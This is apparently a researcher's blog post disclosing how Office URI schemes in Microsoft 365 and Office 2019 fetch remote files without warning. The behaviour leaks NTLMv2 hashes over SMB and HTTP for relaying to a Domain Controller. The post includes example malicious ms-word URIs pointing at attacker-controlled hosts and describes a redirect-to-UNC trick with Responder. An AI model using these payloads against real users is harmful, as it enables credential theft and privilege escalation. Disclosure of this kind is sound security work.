Office URI Schemes
Previously, a method for capturing NTLMv2 hashes over SMB using the Office URI Schemes was shared LINK. This is the inspiring point for me. If we look Office URI Schemes page, we can see that usage of https://
protocol within URI scheme. This situation indicates that http://
can also potentially be used. Capturing the NTLMv2 hash over HTTP is more advantageous than capturing it over SMB for performing NTLM Relaying attack against a Domain Controller server Relaying Chart.
When I used ms-word:ofe|u|http://test.local:8080/leak/leak.docx
URI against the Office 2016 MSO (16.0.4266.1001) 32-bit
, a warning box appeared to protect user from malicious activity but I can not say same for Microsoft 365 Office and Office 2019
. These versions access a remote Office file without a warning and can be exploited to capture NTLMv2 hash over SMB and HTTP protocols.
Vulnerability Details
We can redirect an HTTP request to a UNC path with 302 redirection when an Office application makes a request via Office URI schemes (e.g., ms-word:ofe|u|http://172.20.10.8:8080/leak.docx)
. The uncredirect.py
script handles the HTTP request which is sent with a MS Office URI schema and redirect it to a UNC path which includes IP address of Responder
. This situation would make it possible to capture the NTLMv2 hash over SMB and bypass the security restriction for ms-word:ofe|u|\\<responder ip>\leak\leak.docx
URI.
Capturing the NTLMv2 hash over HTTP is more advantageous than over SMB for relaying LDAP. When a file is requested via an Office URI, the NTLMv2 hash can be obtained over HTTP without redirecting to a UNC path using a 302 redirect. This exploitation method cannot be performed over the Internet because, unless there is a misconfiguration in Internet Properties, NTLM authentication will not occur over HTTP for a host outside the corporate network.
However, I believe this is an effective method for relaying attack and escalating privileges.
What do you think?
It is nice to know your opinion. Leave a comment.